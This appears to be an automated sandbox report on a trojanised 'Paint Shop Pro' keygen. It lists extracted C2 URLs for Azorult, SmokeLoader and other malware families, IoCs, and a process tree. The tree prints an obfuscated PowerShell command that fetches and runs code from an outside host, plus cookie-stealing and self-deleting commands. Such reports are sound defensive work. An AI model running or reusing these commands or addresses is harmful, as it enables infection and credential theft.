azorult | a14f562004b10257bc564eeae33db04a55f3e004d68e6026ab4f5113cadb65c5

Analysis

max time kernel
59s
max time network
302s
platform
windows10_x64
resource
win10v20201028
submitted
04-04-2021 18:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Paint_Shop_Pro_6_02_Eval_all_keygen.exe
Size

5.2MB
MD5

c9d0760f5504d9e8ce237543fc4e7562
SHA1

12dac9b23d9f95b9647767e15a265a73380ad50b
SHA256

2519f6e84956fd35aaf7aa0ac51c2ce4cd8fddc973933936560ddb1efff6a16f
SHA512

28e06d8763858601484ec3675b5d0895712b616d69b36d4c584f32dfb56dfe9a7c26ad05dfda27efc2e9512c11d7dedcafd4d69d98baffdda8eb5af9ba99398a

Score

10^/10

azorult glupteba metasploit smokeloader xmrig backdoor dropper infostealer loader miner trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

resource	yara_rule
behavioral2/memory/4424-201-0x00000000024D0000-0x0000000002DDA000-memory.dmp	family_glupteba
behavioral2/memory/4424-204-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba
behavioral2/memory/4424-203-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 5 IoCs

miner

resource	yara_rule
behavioral2/memory/4620-143-0x00000001402CA898-mapping.dmp	xmrig
behavioral2/memory/4620-142-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral2/memory/4620-145-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral2/memory/4620-224-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral2/memory/7416-781-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig

Executes dropped EXE 10 IoCs

pid	Process
668	keygen-pr.exe
1268	keygen-step-1.exe
576	keygen-step-3.exe
1196	keygen-step-4.exe
2180	key.exe
3344	Setup.exe
3176	multitimer.exe
1784	setups.exe
4032	askinstall20.exe
4036	setups.tmp

Loads dropped DLL 7 IoCs

pid	Process
4036	setups.tmp
4036	setups.tmp
4036	setups.tmp
4036	setups.tmp
4036	setups.tmp
4036	setups.tmp
4036	setups.tmp

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
140	ipinfo.io
142	ipinfo.io
181	ip-api.com
285	ipinfo.io
287	ipinfo.io
338	ip-api.com
443	ipinfo.io

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 14 IoCs

pid	pid_target	Process	procid_target
5264	5216	WerFault.exe	155
6240	5216	WerFault.exe	155
7148	5216	WerFault.exe	155
7560	5216	WerFault.exe	155
7580	5216	WerFault.exe	155
908	5216	WerFault.exe	155
7924	5216	WerFault.exe	155
7724	5216	WerFault.exe	155
3776	5216	WerFault.exe	155
8792	5216	WerFault.exe	155
8300	5216	WerFault.exe	155
7428	5216	WerFault.exe	155
8600	5216	WerFault.exe	155
8692	5216	WerFault.exe	155

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
6508	timeout.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
812	taskkill.exe
4896	taskkill.exe
6756	taskkill.exe
6264	taskkill.exe
6408	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
2644	PING.EXE
1668	PING.EXE
4760	PING.EXE
8360	PING.EXE

Script User-Agent 6 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	286	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	296	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	440	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	446	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	141	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	148	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4036	setups.tmp
4036	setups.tmp

Suspicious use of AdjustPrivilegeToken 36 IoCs

description	pid	Process
Token: SeDebugPrivilege	3344	Setup.exe
Token: SeCreateTokenPrivilege	4032	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	4032	askinstall20.exe
Token: SeLockMemoryPrivilege	4032	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	4032	askinstall20.exe
Token: SeMachineAccountPrivilege	4032	askinstall20.exe
Token: SeTcbPrivilege	4032	askinstall20.exe
Token: SeSecurityPrivilege	4032	askinstall20.exe
Token: SeTakeOwnershipPrivilege	4032	askinstall20.exe
Token: SeLoadDriverPrivilege	4032	askinstall20.exe
Token: SeSystemProfilePrivilege	4032	askinstall20.exe
Token: SeSystemtimePrivilege	4032	askinstall20.exe
Token: SeProfSingleProcessPrivilege	4032	askinstall20.exe
Token: SeIncBasePriorityPrivilege	4032	askinstall20.exe
Token: SeCreatePagefilePrivilege	4032	askinstall20.exe
Token: SeCreatePermanentPrivilege	4032	askinstall20.exe
Token: SeBackupPrivilege	4032	askinstall20.exe
Token: SeRestorePrivilege	4032	askinstall20.exe
Token: SeShutdownPrivilege	4032	askinstall20.exe
Token: SeDebugPrivilege	4032	askinstall20.exe
Token: SeAuditPrivilege	4032	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	4032	askinstall20.exe
Token: SeChangeNotifyPrivilege	4032	askinstall20.exe
Token: SeRemoteShutdownPrivilege	4032	askinstall20.exe
Token: SeUndockPrivilege	4032	askinstall20.exe
Token: SeSyncAgentPrivilege	4032	askinstall20.exe
Token: SeEnableDelegationPrivilege	4032	askinstall20.exe
Token: SeManageVolumePrivilege	4032	askinstall20.exe
Token: SeImpersonatePrivilege	4032	askinstall20.exe
Token: SeCreateGlobalPrivilege	4032	askinstall20.exe
Token: 31	4032	askinstall20.exe
Token: 32	4032	askinstall20.exe
Token: 33	4032	askinstall20.exe
Token: 34	4032	askinstall20.exe
Token: 35	4032	askinstall20.exe
Token: SeDebugPrivilege	3176	multitimer.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1784	setups.exe
4036	setups.tmp

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 1032 wrote to memory of 2788	1032	Paint_Shop_Pro_6_02_Eval_all_keygen.exe	79
PID 1032 wrote to memory of 2788	1032	Paint_Shop_Pro_6_02_Eval_all_keygen.exe	79
PID 1032 wrote to memory of 2788	1032	Paint_Shop_Pro_6_02_Eval_all_keygen.exe	79
PID 2788 wrote to memory of 668	2788	cmd.exe	82
PID 2788 wrote to memory of 668	2788	cmd.exe	82
PID 2788 wrote to memory of 668	2788	cmd.exe	82
PID 2788 wrote to memory of 1268	2788	cmd.exe	83
PID 2788 wrote to memory of 1268	2788	cmd.exe	83
PID 2788 wrote to memory of 1268	2788	cmd.exe	83
PID 2788 wrote to memory of 576	2788	cmd.exe	84
PID 2788 wrote to memory of 576	2788	cmd.exe	84
PID 2788 wrote to memory of 576	2788	cmd.exe	84
PID 2788 wrote to memory of 1196	2788	cmd.exe	85
PID 2788 wrote to memory of 1196	2788	cmd.exe	85
PID 2788 wrote to memory of 1196	2788	cmd.exe	85
PID 668 wrote to memory of 2180	668	keygen-pr.exe	86
PID 668 wrote to memory of 2180	668	keygen-pr.exe	86
PID 668 wrote to memory of 2180	668	keygen-pr.exe	86
PID 1196 wrote to memory of 3344	1196	keygen-step-4.exe	87
PID 1196 wrote to memory of 3344	1196	keygen-step-4.exe	87
PID 2180 wrote to memory of 636	2180	key.exe	88
PID 2180 wrote to memory of 636	2180	key.exe	88
PID 2180 wrote to memory of 636	2180	key.exe	88
PID 576 wrote to memory of 676	576	keygen-step-3.exe	89
PID 576 wrote to memory of 676	576	keygen-step-3.exe	89
PID 576 wrote to memory of 676	576	keygen-step-3.exe	89
PID 676 wrote to memory of 2644	676	cmd.exe	91
PID 676 wrote to memory of 2644	676	cmd.exe	91
PID 676 wrote to memory of 2644	676	cmd.exe	91
PID 3344 wrote to memory of 3176	3344	Setup.exe	92
PID 3344 wrote to memory of 3176	3344	Setup.exe	92
PID 3344 wrote to memory of 1784	3344	Setup.exe	93
PID 3344 wrote to memory of 1784	3344	Setup.exe	93
PID 3344 wrote to memory of 1784	3344	Setup.exe	93
PID 1196 wrote to memory of 4032	1196	keygen-step-4.exe	94
PID 1196 wrote to memory of 4032	1196	keygen-step-4.exe	94
PID 1196 wrote to memory of 4032	1196	keygen-step-4.exe	94
PID 1784 wrote to memory of 4036	1784	setups.exe	95
PID 1784 wrote to memory of 4036	1784	setups.exe	95
PID 1784 wrote to memory of 4036	1784	setups.exe	95
PID 4032 wrote to memory of 4044	4032	askinstall20.exe	97
PID 4032 wrote to memory of 4044	4032	askinstall20.exe	97
PID 4032 wrote to memory of 4044	4032	askinstall20.exe	97

C:\Users\Admin\AppData\Local\Temp\Paint_Shop_Pro_6_02_Eval_all_keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Paint_Shop_Pro_6_02_Eval_all_keygen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1032
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2788
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:668
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2180
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:636
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:1268
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:576
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:676
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:2644
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1196
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3344
    - - C:\Users\Admin\AppData\Local\Temp\WVVAELMSOA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WVVAELMSOA\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3176
      - C:\Users\Admin\AppData\Local\Temp\WVVAELMSOA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WVVAELMSOA\multitimer.exe" 1 3.1617560643.606a0443b1777 101
        6⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\WVVAELMSOA\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WVVAELMSOA\multitimer.exe" 2 3.1617560643.606a0443b1777
        7⤵
        
        PID:4584
        
        C:\Users\Admin\AppData\Local\Temp\4onu2fzc3jg\zkfjid5xecg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4onu2fzc3jg\zkfjid5xecg.exe" /VERYSILENT
        8⤵
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\is-N1PF1.tmp\zkfjid5xecg.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-N1PF1.tmp\zkfjid5xecg.tmp" /SL5="$302B8,2592217,780800,C:\Users\Admin\AppData\Local\Temp\4onu2fzc3jg\zkfjid5xecg.exe" /VERYSILENT
        9⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\is-FHPJO.tmp\winlthsth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-FHPJO.tmp\winlthsth.exe"
        10⤵
        
        PID:4332
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:4772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        12⤵
        
        PID:5108
        
        C:\Users\Admin\AppData\Local\Temp\mpoxhopfczt\rgdzn2bik1y.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mpoxhopfczt\rgdzn2bik1y.exe" /ustwo INSTALL
        8⤵
        
        PID:2368
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "rgdzn2bik1y.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mpoxhopfczt\rgdzn2bik1y.exe" & exit
        9⤵
        
        PID:5596
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "rgdzn2bik1y.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\p2tu32czpbm\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\p2tu32czpbm\cpyrix.exe" /VERYSILENT
        8⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        9⤵
        
        PID:3808
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        10⤵
        
        PID:4668
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        9⤵
        
        PID:5284
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        10⤵
        
        PID:5556
        
        C:\Users\Admin\AppData\Local\Temp\ekblvhx1tw3\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ekblvhx1tw3\app.exe" /8-23
        8⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\fkcuy5vuxij\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fkcuy5vuxij\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\is-3LDUQ.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3LDUQ.tmp\Setup3310.tmp" /SL5="$501D0,138429,56832,C:\Users\Admin\AppData\Local\Temp\fkcuy5vuxij\Setup3310.exe" /Verysilent /subid=577
        9⤵
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\is-M4U3R.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-M4U3R.tmp\Setup.exe" /Verysilent
        10⤵
        
        PID:2132
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
        11⤵
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:4180
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:5976
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
        11⤵
        
        PID:5216
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 952
        12⤵
        Program crash
        
        PID:5264
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 956
        12⤵
        Program crash
        
        PID:6240
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 1080
        12⤵
        Program crash
        
        PID:7148
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 1096
        12⤵
        Program crash
        
        PID:7560
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 1060
        12⤵
        Program crash
        
        PID:7580
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 1156
        12⤵
        Program crash
        
        PID:908
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 1496
        12⤵
        Program crash
        
        PID:7924
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 1540
        12⤵
        Program crash
        
        PID:7724
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 1612
        12⤵
        Program crash
        
        PID:3776
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 1760
        12⤵
        Program crash
        
        PID:8792
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 1812
        12⤵
        Program crash
        
        PID:8300
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 1424
        12⤵
        Program crash
        
        PID:7428
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 1780
        12⤵
        Program crash
        
        PID:8600
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 1620
        12⤵
        Program crash
        
        PID:8692
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
        11⤵
        
        PID:5236
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        11⤵
        
        PID:5260
        
        C:\Users\Admin\AppData\Local\Temp\is-26SQ1.tmp\LabPicV3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-26SQ1.tmp\LabPicV3.tmp" /SL5="$20326,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        12⤵
        
        PID:5484
        
        C:\Users\Admin\AppData\Local\Temp\is-B63CN.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-B63CN.tmp\ppppppfy.exe" /S /UID=lab214
        13⤵
        
        PID:4232
        
        C:\Program Files\VideoLAN\NFWAEEQVGS\prolab.exe
        
        "C:\Program Files\VideoLAN\NFWAEEQVGS\prolab.exe" /VERYSILENT
        14⤵
        
        PID:5576
        
        C:\Users\Admin\AppData\Local\Temp\is-OFEJV.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OFEJV.tmp\prolab.tmp" /SL5="$203EE,575243,216576,C:\Program Files\VideoLAN\NFWAEEQVGS\prolab.exe" /VERYSILENT
        15⤵
        
        PID:5812
        
        C:\Users\Admin\AppData\Local\Temp\75-c6aed-773-25aa6-bf717938258ac\ZHimikuquqe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\75-c6aed-773-25aa6-bf717938258ac\ZHimikuquqe.exe"
        14⤵
        
        PID:5472
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rxqmx2w3.c1o\md6_6ydj.exe & exit
        15⤵
        
        PID:1460
        
        C:\Users\Admin\AppData\Local\Temp\rxqmx2w3.c1o\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\rxqmx2w3.c1o\md6_6ydj.exe
        16⤵
        
        PID:6932
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wc4d1i3k.xce\askinstall31.exe & exit
        15⤵
        
        PID:6296
        
        C:\Users\Admin\AppData\Local\Temp\wc4d1i3k.xce\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\wc4d1i3k.xce\askinstall31.exe
        16⤵
        
        PID:7012
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dn2vko4u.3vq\toolspab1.exe & exit
        15⤵
        
        PID:6640
        
        C:\Users\Admin\AppData\Local\Temp\dn2vko4u.3vq\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\dn2vko4u.3vq\toolspab1.exe
        16⤵
        
        PID:7096
        
        C:\Users\Admin\AppData\Local\Temp\dn2vko4u.3vq\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\dn2vko4u.3vq\toolspab1.exe
        17⤵
        
        PID:6928
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e5d4xxwb.xpq\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:7088
        
        C:\Users\Admin\AppData\Local\Temp\f3-77f4e-e5d-c2193-fed384a559148\Gamolixycy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f3-77f4e-e5d-c2193-fed384a559148\Gamolixycy.exe"
        14⤵
        
        PID:5224
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        11⤵
        
        PID:5304
        
        C:\Users\Admin\AppData\Local\Temp\is-J4G6B.tmp\lylal220.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-J4G6B.tmp\lylal220.tmp" /SL5="$20328,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        12⤵
        
        PID:5492
        
        C:\Users\Admin\AppData\Local\Temp\is-VC79U.tmp\Microsoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-VC79U.tmp\Microsoft.exe" /S /UID=lylal220
        13⤵
        
        PID:6076
        
        C:\Program Files\Mozilla Firefox\IWGDBZBXCX\irecord.exe
        
        "C:\Program Files\Mozilla Firefox\IWGDBZBXCX\irecord.exe" /VERYSILENT
        14⤵
        
        PID:5744
        
